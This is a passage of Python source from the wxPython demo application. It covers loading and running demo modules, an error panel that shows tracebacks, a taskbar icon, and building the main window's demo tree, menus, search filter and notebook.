if treeName == demoName:
# The user clicked on the parent tree item, return the overview
return pkg, treeOverview
elif demoName in treeDemos:
# The user clicked on a real demo, return the package
return key, overview
# No match found, return None for both
return pkg, overview
#---------------------------------------------------------------------------
class ModuleDictWrapper(object):
"""Emulates a module with a dynamically compiled __dict__"""
def __init__(self, dict):
self.dict = dict
def __getattr__(self, name):
if name in self.dict:
return self.dict[name]
else:
raise AttributeError
class DemoModules(object):
"""
Dynamically manages the original/modified versions of a demo
module
"""
def __init__(self, name):
self.modActive = -1
self.name = name
# (dict , source , filename , description , error information )
# ( 0 , 1 , 2 , 3 , 4 )
self.modules = [[dict(), "" , "" , "<original>" , None],
[dict(), "" , "" , "<modified>" , None]]
getcwd = os.getcwd if six.PY3 else os.getcwdu
for i in [modOriginal, modModified]:
self.modules[i][0]['__file__'] = \
os.path.join(getcwd(), GetOriginalFilename(name))
# load original module
self.LoadFromFile(modOriginal, GetOriginalFilename(name))
self.SetActive(modOriginal)
# load modified module (if one exists)
if DoesModifiedExist(name):
self.LoadFromFile(modModified, GetModifiedFilename(name))
def LoadFromFile(self, modID, filename):
self.modules[modID][2] = filename
file = open(filename, "rt")
self.LoadFromSource(modID, file.read())
file.close()
def LoadFromSource(self, modID, source):
self.modules[modID][1] = source
self.LoadDict(modID)
def LoadDict(self, modID):
if self.name != __name__:
source = self.modules[modID][1]
description = self.modules[modID][2]
if six.PY2:
description = description.encode(sys.getfilesystemencoding())
try:
code = compile(source, description, "exec")
exec_(code, self.modules[modID][0])
except:
self.modules[modID][4] = DemoError(sys.exc_info())
self.modules[modID][0] = None
else:
self.modules[modID][4] = None
def SetActive(self, modID):
if modID != modOriginal and modID != modModified:
raise LookupError
else:
self.modActive = modID
def GetActive(self):
dict = self.modules[self.modActive][0]
if dict is None:
return None
else:
return ModuleDictWrapper(dict)
def GetActiveID(self):
return self.modActive
def GetSource(self, modID = None):
if modID is None:
modID = self.modActive
return self.modules[modID][1]
def GetFilename(self, modID = None):
if modID is None:
modID = self.modActive
return self.modules[self.modActive][2]
def GetErrorInfo(self, modID = None):
if modID is None:
modID = self.modActive
return self.modules[self.modActive][4]
def Exists(self, modID):
return self.modules[modID][1] != ""
def UpdateFile(self, modID = None):
"""Updates the file from which a module was loaded
with (possibly updated) source"""
if modID is None:
modID = self.modActive
source = self.modules[modID][1]
filename = self.modules[modID][2]
try:
file = open(filename, "wt")
file.write(source)
finally:
file.close()
def Delete(self, modID):
if self.modActive == modID:
self.SetActive(0)
self.modules[modID][0] = None
self.modules[modID][1] = ""
self.modules[modID][2] = ""
#---------------------------------------------------------------------------
class DemoError(object):
"""Wraps and stores information about the current exception"""
def __init__(self, exc_info):
import copy
excType, excValue = exc_info[:2]
# traceback list entries: (filename, line number, function name, text)
self.traceback = traceback.extract_tb(exc_info[2])
# --Based on traceback.py::format_exception_only()--
if isinstance(excType, type):
self.exception_type = excType.__name__
else:
self.exception_type = excType
# If it's a syntax error, extra information needs
# to be added to the traceback
if excType is SyntaxError:
try:
msg, (filename, lineno, self.offset, line) = excValue
except:
pass
else:
if not filename:
filename = "<string>"
line = line.strip()
self.traceback.append( (filename, lineno, "", line) )
excValue = msg
try:
self.exception_details = str(excValue)
except:
self.exception_details = "<unprintable %s object>" & type(excValue).__name__
del exc_info
def __str__(self):
ret = "Type %s \n \
Traceback: %s \n \
Details : %s" % ( str(self.exception_type), str(self.traceback), self.exception_details )
return ret
#---------------------------------------------------------------------------
class DemoErrorPanel(wx.Panel):
"""Panel put into the demo tab when the demo fails to run due to errors"""
def __init__(self, parent, codePanel, demoError, log):
wx.Panel.__init__(self, parent, -1)#, style=wx.NO_FULL_REPAINT_ON_RESIZE)
self.codePanel = codePanel
self.nb = parent
self.log = log
self.box = wx.BoxSizer(wx.VERTICAL)
# Main Label
self.box.Add(wx.StaticText(self, -1, "An error has occurred while trying to run the demo")
, 0, wx.ALIGN_CENTER | wx.TOP, 10)
# Exception Information
boxInfo = wx.StaticBox(self, -1, "Exception Info" )
boxInfoSizer = wx.StaticBoxSizer(boxInfo, wx.VERTICAL ) # Used to center the grid within the box
boxInfoGrid = wx.FlexGridSizer( cols=2 )
textFlags = wx.ALIGN_RIGHT | wx.LEFT | wx.RIGHT | wx.TOP
boxInfoGrid.Add(wx.StaticText(self, -1, "Type: "), 0, textFlags, 5 )
boxInfoGrid.Add(wx.StaticText(self, -1, str(demoError.exception_type)) , 0, textFlags, 5 )
boxInfoGrid.Add(wx.StaticText(self, -1, "Details: ") , 0, textFlags, 5 )
boxInfoGrid.Add(wx.StaticText(self, -1, demoError.exception_details) , 0, textFlags, 5 )
boxInfoSizer.Add(boxInfoGrid, 0, wx.ALIGN_CENTRE | wx.ALL, 5 )
self.box.Add(boxInfoSizer, 0, wx.ALIGN_CENTER | wx.ALL, 5)
# Set up the traceback list
# This one automatically resizes last column to take up remaining space
from ListCtrl import TestListCtrl
self.list = TestListCtrl(self, -1, style=wx.LC_REPORT | wx.SUNKEN_BORDER)
self.list.Bind(wx.EVT_LEFT_DCLICK, self.OnDoubleClick)
self.list.Bind(wx.EVT_LIST_ITEM_SELECTED, self.OnItemSelected)
self.list.InsertColumn(0, "Filename")
self.list.InsertColumn(1, "Line", wx.LIST_FORMAT_RIGHT)
self.list.InsertColumn(2, "Function")
self.list.InsertColumn(3, "Code")
self.InsertTraceback(self.list, demoError.traceback)
self.list.SetColumnWidth(0, wx.LIST_AUTOSIZE)
self.list.SetColumnWidth(2, wx.LIST_AUTOSIZE)
self.box.Add(wx.StaticText(self, -1, "Traceback:")
, 0, wx.ALIGN_CENTER | wx.TOP, 5)
self.box.Add(self.list, 1, wx.GROW | wx.ALIGN_CENTER | wx.ALL, 5)
self.box.Add(wx.StaticText(self, -1, "Entries from the demo module are shown in blue\n"
+ "Double-click on them to go to the offending line")
, 0, wx.ALIGN_CENTER | wx.BOTTOM, 5)
self.box.Fit(self)
self.SetSizer(self.box)
def InsertTraceback(self, list, traceback):
#Add the traceback data
for x in range(len(traceback)):
data = traceback[x]
list.InsertItem(x, os.path.basename(data[0])) # Filename
list.SetItem(x, 1, str(data[1])) # Line
list.SetItem(x, 2, str(data[2])) # Function
list.SetItem(x, 3, str(data[3])) # Code
# Check whether this entry is from the demo module
if data[0] == "<original>" or data[0] == "<modified>": # FIXME: make more generalised
self.list.SetItemData(x, int(data[1])) # Store line number for easy access
# Give it a blue colour
item = self.list.GetItem(x)
item.SetTextColour(wx.BLUE)
self.list.SetItem(item)
else:
self.list.SetItemData(x, -1) # Editor can't jump into this one's code
def OnItemSelected(self, event):
# This occurs before OnDoubleClick and can be used to set the
# currentItem. OnDoubleClick doesn't get a wxListEvent....
self.currentItem = event.Index
event.Skip()
def OnDoubleClick(self, event):
# If double-clicking on a demo's entry, jump to the line number
line = self.list.GetItemData(self.currentItem)
if line != -1:
self.nb.SetSelection(1) # Switch to the code viewer tab
wx.CallAfter(self.codePanel.JumpToLine, line-1, True)
event.Skip()
#---------------------------------------------------------------------------
class MainPanel(wx.Panel):
"""
Just a simple derived panel where we override Freeze and Thaw to work
around an issue on wxGTK.
"""
def Freeze(self):
if 'wxMSW' in wx.PlatformInfo:
return super(MainPanel, self).Freeze()
def Thaw(self):
if 'wxMSW' in wx.PlatformInfo:
return super(MainPanel, self).Thaw()
#---------------------------------------------------------------------------
class DemoTaskBarIcon(TaskBarIcon):
TBMENU_RESTORE = wx.NewId()
TBMENU_CLOSE = wx.NewId()
TBMENU_CHANGE = wx.NewId()
TBMENU_REMOVE = wx.NewId()
def __init__(self, frame):
TaskBarIcon.__init__(self, wx.adv.TBI_DOCK) # wx.adv.TBI_CUSTOM_STATUSITEM
self.frame = frame
# Set the image
icon = self.MakeIcon(images.WXPdemo.GetImage())
self.SetIcon(icon, "wxPython Demo")
self.imgidx = 1
# bind some events
self.Bind(wx.adv.EVT_TASKBAR_LEFT_DCLICK, self.OnTaskBarActivate)
self.Bind(wx.EVT_MENU, self.OnTaskBarActivate, id=self.TBMENU_RESTORE)
self.Bind(wx.EVT_MENU, self.OnTaskBarClose, id=self.TBMENU_CLOSE)
self.Bind(wx.EVT_MENU, self.OnTaskBarChange, id=self.TBMENU_CHANGE)
self.Bind(wx.EVT_MENU, self.OnTaskBarRemove, id=self.TBMENU_REMOVE)
def CreatePopupMenu(self):
"""
This method is called by the base class when it needs to popup
the menu for the default EVT_RIGHT_DOWN event. Just create
the menu how you want it and return it from this function,
the base class takes care of the rest.
"""
menu = wx.Menu()
menu.Append(self.TBMENU_RESTORE, "Restore wxPython Demo")
menu.Append(self.TBMENU_CLOSE, "Close wxPython Demo")
menu.AppendSeparator()
menu.Append(self.TBMENU_CHANGE, "Change the TB Icon")
menu.Append(self.TBMENU_REMOVE, "Remove the TB Icon")
return menu
def MakeIcon(self, img):
"""
The various platforms have different requirements for the
icon size...
"""
if "wxMSW" in wx.PlatformInfo:
img = img.Scale(16, 16)
elif "wxGTK" in wx.PlatformInfo:
img = img.Scale(22, 22)
# wxMac can be any size upto 128x128, so leave the source img alone....
icon = wx.Icon(img.ConvertToBitmap())
return icon
def OnTaskBarActivate(self, evt):
if self.frame.IsIconized():
self.frame.Iconize(False)
if not self.frame.IsShown():
self.frame.Show(True)
self.frame.Raise()
def OnTaskBarClose(self, evt):
wx.CallAfter(self.frame.Close)
def OnTaskBarChange(self, evt):
names = [ "WXPdemo", "Mondrian", "Pencil", "Carrot" ]
name = names[self.imgidx]
eImg = getattr(images, name)
self.imgidx += 1
if self.imgidx >= len(names):
self.imgidx = 0
icon = self.MakeIcon(eImg.Image)
self.SetIcon(icon, "This is a new icon: " + name)
def OnTaskBarRemove(self, evt):
self.RemoveIcon()
#---------------------------------------------------------------------------
class wxPythonDemo(wx.Frame):
overviewText = "wxPython Overview"
def __init__(self, parent, title):
wx.Frame.__init__(self, parent, -1, title, size = (970, 720),
style=wx.DEFAULT_FRAME_STYLE | wx.NO_FULL_REPAINT_ON_RESIZE)
self.SetMinSize((640,480))
self.pnl = pnl = MainPanel(self)
self.mgr = aui.AuiManager()
self.mgr.SetManagedWindow(pnl)
self.loaded = False
self.cwd = os.getcwd()
self.curOverview = ""
self.demoPage = None
self.codePage = None
self.shell = None
self.firstTime = True
self.finddlg = None
icon = images.WXPdemo.GetIcon()
self.SetIcon(icon)
try:
self.tbicon = DemoTaskBarIcon(self)
except:
self.tbicon = None
self.otherWin = None
self.allowDocs = False
self.downloading = False
self.internetThread = None
self.downloadImage = 2
self.sendDownloadError = True
self.downloadTimer = wx.Timer(self, wx.ID_ANY)
self.Bind(wx.EVT_IDLE, self.OnIdle)
self.Bind(wx.EVT_CLOSE, self.OnCloseWindow)
self.Bind(wx.EVT_ICONIZE, self.OnIconfiy)
self.Bind(wx.EVT_MAXIMIZE, self.OnMaximize)
self.Bind(wx.EVT_TIMER, self.OnDownloadTimer, self.downloadTimer)
self.Centre(wx.BOTH)
self.statusBar = self.CreateStatusBar(2)#, wx.ST_SIZEGRIP
self.statusBar.SetStatusWidths([-2, -1])
statusText = "Welcome to wxPython %s" % wx.VERSION_STRING
self.statusBar.SetStatusText(statusText, 0)
self.downloadGauge = wx.Gauge(self.statusBar, wx.ID_ANY, 50)
self.downloadGauge.SetToolTip("Downloading Docs...")
self.downloadGauge.Hide()
self.sizeChanged = False
self.Reposition()
self.statusBar.Bind(wx.EVT_SIZE, self.OnStatusBarSize)
self.statusBar.Bind(wx.EVT_IDLE, self.OnStatusBarIdle)
self.dying = False
self.skipLoad = False
self.allowAuiFloating = False
def EmptyHandler(evt): pass
self.ReadConfigurationFile()
self.externalDemos = HuntExternalDemos()
# Create a Notebook
self.nb = wx.Notebook(pnl, -1, style=wx.CLIP_CHILDREN)
if 'wxMac' not in wx.PlatformInfo:
imgList = wx.ImageList(16, 16)
for png in ["overview", "code", "demo"]:
bmp = images.catalog[png].GetBitmap()
imgList.Add(bmp)
for indx in range(9):
bmp = images.catalog["spinning_nb%d"%indx].GetBitmap()
imgList.Add(bmp)
self.nb.AssignImageList(imgList)
self.BuildMenuBar()
self.finddata = wx.FindReplaceData()
self.finddata.SetFlags(wx.FR_DOWN)
# Create a TreeCtrl
leftPanel = wx.Panel(pnl, style=wx.TAB_TRAVERSAL|wx.CLIP_CHILDREN)
self.treeMap = {}
self.searchItems = {}
self.tree = wxPythonDemoTree(leftPanel)
self.filter = wx.SearchCtrl(leftPanel, style=wx.TE_PROCESS_ENTER)
self.filter.ShowCancelButton(True)
self.filter.Bind(wx.EVT_TEXT, self.RecreateTree)
self.filter.Bind(wx.EVT_SEARCHCTRL_CANCEL_BTN,
lambda e: self.filter.SetValue(''))
self.filter.Bind(wx.EVT_TEXT_ENTER, self.OnSearch)
searchMenu = wx.Menu()
item = searchMenu.AppendRadioItem(-1, "Sample Name")
self.Bind(wx.EVT_MENU, self.OnSearchMenu, item)
item = searchMenu.AppendRadioItem(-1, "Sample Content")
self.Bind(wx.EVT_MENU, self.OnSearchMenu, item)
self.filter.SetMenu(searchMenu)
self.RecreateTree()
self.tree.SetExpansionState(self.expansionState)
self.tree.Bind(wx.EVT_TREE_ITEM_EXPANDED, self.OnItemExpanded)
self.tree.Bind(wx.EVT_TREE_ITEM_COLLAPSED, self.OnItemCollapsed)
self.tree.Bind(wx.EVT_TREE_SEL_CHANGED, self.OnSelChanged)
self.tree.Bind(wx.EVT_LEFT_DOWN, self.OnTreeLeftDown)
# Set up a wx.html.HtmlWindow on the Overview Notebook page
# we put it in a panel first because there seems to be a
# refresh bug of some sort (wxGTK) when it is directly in
# the notebook...
if 0: # the old way
self.ovr = wx.html.HtmlWindow(self.nb, -1, size=(400, 400))
self.nb.AddPage(self.ovr, self.overviewText, imageId=0)
else: # hopefully I can remove this hacky code soon, see SF bug #216861
panel = wx.Panel(self.nb, -1, style=wx.CLIP_CHILDREN)
self.ovr = wx.html.HtmlWindow(panel, -1, size=(400, 400))
self.nb.AddPage(panel, self.overviewText, imageId=0)
def OnOvrSize(evt, ovr=self.ovr):
ovr.SetSize(evt.GetSize())
panel.Bind(wx.EVT_SIZE, OnOvrSize)
panel.Bind(wx.EVT_ERASE_BACKGROUND, EmptyHandler)
if "gtk2" in wx.PlatformInfo or "gtk3" in wx.PlatformInfo:
self.ovr.SetStandardFonts()
self.SetOverview(self.overviewText, mainOverview)
# Set up a log window
self.log = wx.TextCtrl(pnl, -1,
style = wx.TE_MULTILINE|wx.TE_READONLY|wx.HSCROLL)
if wx.Platform == "__WXMAC__":
self.log.MacCheckSpelling(False)
# Set the wxWindows log target to be this textctrl
#wx.Log.SetActiveTarget(wx.LogTextCtrl(self.log))
# But instead of the above we want to show how to use our own wx.Log class
wx.Log.SetActiveTarget(MyLog(self.log))
# for serious debugging
#wx.Log.SetActiveTarget(wx.LogStderr())
#wx.Log.SetTraceMask(wx.TraceMessages)
self.Bind(wx.EVT_ACTIVATE, self.OnActivate)
wx.GetApp().Bind(wx.EVT_ACTIVATE_APP, self.OnAppActivate)
# add the windows to the splitter and split it.
leftBox = wx.BoxSizer(wx.VERTICAL)
leftBox.Add(self.tree, 1, wx.EXPAND)
leftBox.Add(wx.StaticText(leftPanel, label = "Filter Demos:"), 0, wx.TOP|wx.LEFT, 5)
leftBox.Add(self.filter, 0, wx.EXPAND|wx.ALL, 5)
if 'wxMac' in wx.PlatformInfo:
leftBox.Add((5,5)) # Make sure there is room for the focus ring
leftPanel.SetSizer(leftBox)
# select initial items
self.nb.SetSelection(0)
self.tree.SelectItem(self.root)
# Load 'Main' module
self.LoadDemo(self.overviewText)
self.loaded = True
# select some other initial module?
if len(sys.argv) > 1:
arg = sys.argv[1]
if arg.endswith('.py'):
arg = arg[:-3]
selectedDemo = self.treeMap.get(arg, None)
if selectedDemo:
self.tree.SelectItem(selectedDemo)
self.tree.EnsureVisible(selectedDemo)
# Use the aui manager to set up everything
self.mgr.AddPane(self.nb, aui.AuiPaneInfo().CenterPane().Name("Notebook"))
self.mgr.AddPane(leftPanel,
aui.AuiPaneInfo().
Left().Layer(2).BestSize((240, -1)).
MinSize((240, -1)).
Floatable(self.allowAuiFloating).FloatingSize((240, 700)).
Caption("wxPython Demos").
CloseButton(False).
Name("DemoTree"))
self.mgr.AddPane(self.log,
aui.AuiPaneInfo().
Bottom().BestSize((-1, 150)).
MinSize((-1, 140)).
Floatable(self.allowAuiFloating).FloatingSize((500, 160)).
Caption("Demo Log Messages").
CloseButton(False).
Name("LogWindow"))
self.auiConfigurations[DEFAULT_PERSPECTIVE] = self.mgr.SavePerspective()
self.mgr.Update()
self.mgr.SetAGWFlags(self.mgr.GetAGWFlags() ^ aui.AUI_MGR_TRANSPARENT_DRAG)
def ReadConfigurationFile(self):
self.auiConfigurations = {}
self.expansionState = [0, 1]
config = GetConfig()
val = config.Read('ExpansionState')
if val:
self.expansionState = eval(val)
val = config.Read('AUIPerspectives')
if val:
self.auiConfigurations = eval(val)
val = config.Read('AllowDownloads')
if val:
self.allowDocs = eval(val)
val = config.Read('AllowAUIFloating')
if val:
self.allowAuiFloating = eval(val)
MakeDocDirs()
pickledFile = GetDocFile()
if not os.path.isfile(pickledFile):
self.pickledData = {}
return
fid = open(pickledFile, "rb")
try:
self.pickledData = cPickle.load(fid)
except:
self.pickledData = {}
fid.close()
def BuildMenuBar(self):
# Make a File menu
self.mainmenu = wx.MenuBar()
menu = wx.Menu()
item = menu.Append(-1, '&Redirect Output',
'Redirect print statements to a window',
wx.ITEM_CHECK)
self.Bind(wx.EVT_MENU, self.OnToggleRedirect, item)
wx.App.SetMacExitMenuItemId(9123)
exitItem = wx.MenuItem(menu, 9123, 'E&xit\tCtrl-Q', 'Get the heck outta here!')
exitItem.SetBitmap(images.catalog['exit'].GetBitmap())
menu.Append(exitItem)
self.Bind(wx.EVT_MENU, self.OnFileExit, exitItem)
self.mainmenu.Append(menu, '&File')
# Make a Demo menu
menu = wx.Menu()
for indx, item in enumerate(_treeList[:-1]):
menuItem = wx.MenuItem(menu, -1, item[0])
submenu = wx.Menu()
for childItem in item[1]:
mi = submenu.Append(-1, childItem)
self.Bind(wx.EVT_MENU, self.OnDemoMenu, mi)
menuItem.SetBitmap(images.catalog[_demoPngs[indx+1]].GetBitmap())
menuItem.SetSubMenu(submenu)
menu.Append(menuItem)
self.mainmenu.Append(menu, '&Demo')
# Make an Option menu
menu = wx.Menu()
item = wx.MenuItem(menu, -1, 'Allow download of docs', 'Docs for window styles and events from the web', wx.ITEM_CHECK)
menu.Append(item)
item.Check(self.allowDocs)
self.Bind(wx.EVT_MENU, self.OnAllowDownload, item)
item = wx.MenuItem(menu, -1, 'Delete saved docs', 'Deletes the cPickle file where docs are stored')
item.SetBitmap(images.catalog['deletedocs'].GetBitmap())
menu.Append(item)
self.Bind(wx.EVT_MENU, self.OnDeleteDocs, item)
menu.AppendSeparator()
item = wx.MenuItem(menu, -1, 'Allow floating panes', 'Allows the demo panes to be floated using wxAUI', wx.ITEM_CHECK)
menu.Append(item)
item.Check(self.allowAuiFloating)
self.Bind(wx.EVT_MENU, self.OnAllowAuiFloating, item)
auiPerspectives = list(self.auiConfigurations.keys())
auiPerspectives.sort()
perspectivesMenu = wx.Menu()
item = wx.MenuItem(perspectivesMenu, -1, DEFAULT_PERSPECTIVE, "Load startup default perspective", wx.ITEM_RADIO)
self.Bind(wx.EVT_MENU, self.OnAUIPerspectives, item)
perspectivesMenu.Append(item)
for indx, key in enumerate(auiPerspectives):
if key == DEFAULT_PERSPECTIVE:
continue
item = wx.MenuItem(perspectivesMenu, -1, key, "Load user perspective %d"%indx, wx.ITEM_RADIO)
perspectivesMenu.Append(item)
self.Bind(wx.EVT_MENU, self.OnAUIPerspectives, item)
menu.Append(wx.ID_ANY, "&AUI Perspectives", perspectivesMenu)
self.perspectives_menu = perspectivesMenu
item = wx.MenuItem(menu, -1, 'Save Perspective', 'Save AUI perspective')
item.SetBitmap(images.catalog['saveperspective'].GetBitmap())
menu.Append(item)
self.Bind(wx.EVT_MENU, self.OnSavePerspective, item)
item = wx.MenuItem(menu, -1, 'Delete Perspective', 'Delete AUI perspective')
item.SetBitmap(images.catalog['deleteperspective'].GetBitmap())
menu.Append(item)
self.Bind(wx.EVT_MENU, self.OnDeletePerspective, item)
menu.AppendSeparator()
item = wx.MenuItem(menu, -1, 'Restore Tree Expansion', 'Restore the initial tree expansion state')
item.SetBitmap(images.catalog['expansion'].GetBitmap())
menu.Append(item)
self.Bind(wx.EVT_MENU, self.OnTreeExpansion, item)
self.mainmenu.Append(menu, '&Options')
self.options_menu = menu
# Make a Help menu
menu = wx.Menu()
findItem = wx.MenuItem(menu, -1, '&Find\tCtrl-F', 'Find in the Demo Code')
findItem.SetBitmap(images.catalog['find'].GetBitmap())
if 'wxMac' not in wx.PlatformInfo:
findNextItem = wx.MenuItem(menu, -1, 'Find &Next\tF3', 'Find Next')
else:
findNextItem = wx.MenuItem(menu, -1, 'Find &Next\tCtrl-G', 'Find Next')
findNextItem.SetBitmap(images.catalog['findnext'].GetBitmap())
menu.Append(findItem)
menu.Append(findNextItem)
menu.AppendSeparator()
shellItem = wx.MenuItem(menu, -1, 'Open Py&Shell Window\tF5',
'An interactive interpreter window with the demo app and frame objects in the namesapce')
shellItem.SetBitmap(images.catalog['pyshell'].GetBitmap())
menu.Append(shellItem)
inspToolItem = wx.MenuItem(menu, -1, 'Open &Widget Inspector\tF6',
'A tool that lets you browse the live widgets and sizers in an application')
inspToolItem.SetBitmap(images.catalog['inspect'].GetBitmap())
menu.Append(inspToolItem)
if 'wxMac' not in wx.PlatformInfo:
menu.AppendSeparator()
helpItem = menu.Append(wx.ID_ABOUT, '&About wxPython Demo', 'wxPython RULES!!!')
self.Bind(wx.EVT_MENU, self.OnOpenShellWindow, shellItem)
self.Bind(wx.EVT_MENU, self.OnOpenWidgetInspector, inspToolItem)
self.Bind(wx.EVT_MENU, self.OnHelpAbout, helpItem)
self.Bind(wx.EVT_MENU, self.OnHelpFind, findItem)
self.Bind(wx.EVT_MENU, self.OnFindNext, findNextItem)
self.Bind(wx.EVT_FIND, self.OnFind)
self.Bind(wx.EVT_FIND_NEXT, self.OnFind)
self.Bind(wx.EVT_FIND_CLOSE, self.OnFindClose)
self.Bind(wx.EVT_UPDATE_UI, self.OnUpdateFindItems, findItem)
self.Bind(wx.EVT_UPDATE_UI, self.OnUpdateFindItems, findNextItem)
self.mainmenu.Append(menu, '&Help')
self.SetMenuBar(self.mainmenu)
self.EnableAUIMenu()
if False:
# This is another way to set Accelerators, in addition to
# using the '\t<key>' syntax in the menu items.
aTable = wx.AcceleratorTable([(wx.ACCEL_ALT, ord('X'), exitItem.GetId()),
(wx.ACCEL_CTRL, ord('H'), helpItem.GetId()),
(wx.ACCEL_CTRL, ord('F'), findItem.GetId()),
(wx.ACCEL_NORMAL, wx.WXK_F3, findNextItem.GetId()),
(wx.ACCEL_NORMAL, wx.WXK_F9, shellItem.GetId()),
])
self.SetAcceleratorTable(aTable)
#---------------------------------------------
def RecreateTree(self, evt=None):
# Catch the search type (name or content)
searchMenu = self.filter.GetMenu().GetMenuItems()
fullSearch = searchMenu[1].IsChecked()
if evt:
if fullSearch:
# Do not`scan all the demo files for every char
# the user input, use wx.EVT_TEXT_ENTER instead
return
expansionState = self.tree.GetExpansionState()
current = None
item = self.tree.GetSelection()
if item:
prnt = self.tree.GetItemParent(item)
if prnt:
current = (self.tree.GetItemText(item),
self.tree.GetItemText(prnt))
self.tree.Freeze()
self.tree.DeleteAllItems()
self.root = self.tree.AddRoot("wxPython Overview")
self.tree.SetItemImage(self.root, 0)
self.tree.SetItemData(self.root, 0)
treeFont = self.tree.GetFont()
catFont = self.tree.GetFont()
# The native treectrl on MSW has a bug where it doesn't draw
# all of the text for an item if the font is larger than the
# default. It seems to be clipping the item's label as if it
# was the size of the same label in the default font.
if USE_CUSTOMTREECTRL or 'wxMSW' not in wx.PlatformInfo:
treeFont.SetPointSize(treeFont.GetPointSize()+2)
treeFont.SetWeight(wx.FONTWEIGHT_BOLD)
catFont.SetWeight(wx.FONTWEIGHT_BOLD)
self.tree.SetItemFont(self.root, treeFont)
firstChild = None
selectItem = None
filter = self.filter.GetValue()
count = 0
for category, items in _treeList:
count += 1
if filter:
if fullSearch:
items = self.searchItems[category]
else:
items = [item for item in items if filter.lower() in item.lower()]
if items:
child = self.tree.AppendItem(self.root, category, image=count)
self.tree.SetItemFont(child, catFont)
self.tree.SetItemData(child, count)
if not firstChild: firstChild = child
for childItem in items:
image = count
if DoesModifiedExist(childItem):
image = len(_demoPngs)
theDemo = self.tree.AppendItem(child, childItem, image=image)
self.tree.SetItemData(theDemo, count)
self.treeMap[childItem] = theDemo
if current and (childItem, category) == current:
selectItem = theDemo
self.tree.Expand(self.root)
if firstChild:
self.tree.Expand(firstChild)
if filter:
self.tree.ExpandAll()
elif expansionState:
self.tree.SetExpansionState(expansionState)
if selectItem:
self.skipLoad = True
self.tree.SelectItem(selectItem)
self.skipLoad = False
self.tree.Thaw()
self.searchItems = {}
def OnStatusBarSize(self, evt):
self.Reposition() # for normal size events
# Set a flag so the idle time handler will also do the repositioning.
# It is done this way to get around a buglet where GetFieldRect is not
# accurate during the EVT_SIZE resulting from a frame maximize.
self.sizeChanged = True
def OnStatusBarIdle(self, evt):
if self.sizeChanged:
self.Reposition()
# reposition the download gauge
def Reposition(self):
# rect = self.statusBar.GetFieldRect(1)
# self.downloadGauge.SetPosition((rect.x+2, rect.y+2))
# self.downloadGauge.SetSize((rect.width-4, rect.height-4))
self.sizeChanged = False
def OnSearchMenu(self, event):
# Catch the search type (name or content)
searchMenu = self.filter.GetMenu().GetMenuItems()
fullSearch = searchMenu[1].IsChecked()
if fullSearch:
self.OnSearch()
else:
self.RecreateTree()
def OnSearch(self, event=None):
value = self.filter.GetValue()
if not value:
self.RecreateTree()
return
wx.BeginBusyCursor()
for category, items in _treeList:
self.searchItems[category] = []
for childItem in items:
if SearchDemo(childItem, value):
self.searchItems[category].append(childItem)
wx.EndBusyCursor()
self.RecreateTree()
def SetTreeModified(self, modified):
item = self.tree.GetSelection()
if modified:
image = len(_demoPngs)
else:
image = self.tree.GetItemData(item)
self.tree.SetItemImage(item, image)
def WriteText(self, text):
if text[-1:] == '\n':
text = text[:-1]
wx.LogMessage(text)
def write(self, txt):
self.WriteText(txt)
#---------------------------------------------
def OnItemExpanded(self, event):
item = event.GetItem()
wx.LogMessage("OnItemExpanded: %s" % self.tree.GetItemText(item))
event.Skip()
#---------------------------------------------
def OnItemCollapsed(self, event):
item = event.GetItem()
wx.LogMessage("OnItemCollapsed: %s" % self.tree.GetItemText(item))
event.Skip()
#---------------------------------------------
def OnTreeLeftDown(self, event):
# reset the overview text if the tree item is clicked on again
pt = event.GetPosition()
item, flags = self.tree.HitTest(pt)
if item == self.tree.GetSelection():
self.SetOverview(self.tree.GetItemText(item)+" Overview", self.curOverview)
event.Skip()
#---------------------------------------------
def OnSelChanged(self, event):
if self.dying or not self.loaded or self.skipLoad:
return
self.StopDownload()
item = event.GetItem()
itemText = self.tree.GetItemText(item)
self.LoadDemo(itemText)
self.StartDownload()
#---------------------------------------------
def LoadDemo(self, demoName):
try:
wx.BeginBusyCursor()
self.pnl.Freeze()
os.chdir(self.cwd)
self.ShutdownDemoModule()
if demoName == self.overviewText:
# User selected the "wxPython Overview" node
# ie: _this_ module
# Changing the main window at runtime not yet supported...
self.demoModules = DemoModules(__name__)
self.SetOverview(self.overviewText, mainOverview)
self.LoadDemoSource()
self.UpdateNotebook(0)
else:
if os.path.exists(GetOriginalFilename(demoName)):
wx.LogMessage("Loading demo %s.py..." % demoName)
self.demoModules = DemoModules(demoName)
self.LoadDemoSource()
else:
package, overview = LookForExternals(self.externalDemos, demoName)
if package:
wx.LogMessage("Loading demo %s.py..." % ("%s/%s"%(package, demoName)))
self.demoModules = DemoModules("%s/%s"%(package, demoName))
self.LoadDemoSource()
elif overview:
self.SetOverview(demoName, overview)
self.codePage = None
self.UpdateNotebook(0)
else:
self.SetOverview("wxPython", mainOverview)
self.codePage = None
self.UpdateNotebook(0)
finally:
wx.EndBusyCursor()
self.pnl.Thaw()
#---------------------------------------------
def LoadDemoSource(self):
self.codePage = None
self.codePage = DemoCodePanel(self.nb, self)
self.codePage.LoadDemo(self.demoModules)
#---------------------------------------------
def RunModule(self):
"""Runs the active module"""
module = self.demoModules.GetActive()
self.ShutdownDemoModule()
overviewText = ""
# o The RunTest() for all samples must now return a window that can
# be palced in a tab in the main notebook.
# o If an error occurs (or has occurred before) an error tab is created.
if module is not None:
wx.LogMessage("Running demo module...")
if hasattr(module, "overview"):
overviewText = module.overview
try:
self.demoPage = module.runTest(self, self.nb, self)
except:
self.demoPage = DemoErrorPanel(self.nb, self.codePage,
DemoError(sys.exc_info()), self)
bg = self.nb.GetThemeBackgroundColour()
if bg:
self.demoPage.SetBackgroundColour(bg)
assert self.demoPage is not None, "runTest must return a window!"
else:
# There was a previous error in compiling or exec-ing
self.demoPage = DemoErrorPanel(self.nb, self.codePage,
self.demoModules.GetErrorInfo(), self)
self.SetOverview(self.demoModules.name + " Overview", overviewText)
if self.firstTime:
# change to the demo page the first time a module is run
self.UpdateNotebook(2)
self.firstTime = False
else:
# otherwise just stay on the same tab in case the user has changed to another one
self.UpdateNotebook()
#---------------------------------------------
def ShutdownDemoModule(self):
if self.demoPage:
# inform the window that it's time to quit if it cares
if hasattr(self.demoPage, "ShutdownDemo"):
self.demoPage.ShutdownDemo()
## wx.YieldIfNeeded() # in case the page has pending events
self.demoPage = None
#---------------------------------------------
def UpdateNotebook(self, select = -1):
nb = self.nb
debug = False
self.pnl.Freeze()
def UpdatePage(page, pageText):
pageExists = False
pagePos = -1
for i in range(nb.GetPageCount()):
if nb.GetPageText(i) == pageText:
pageExists = True
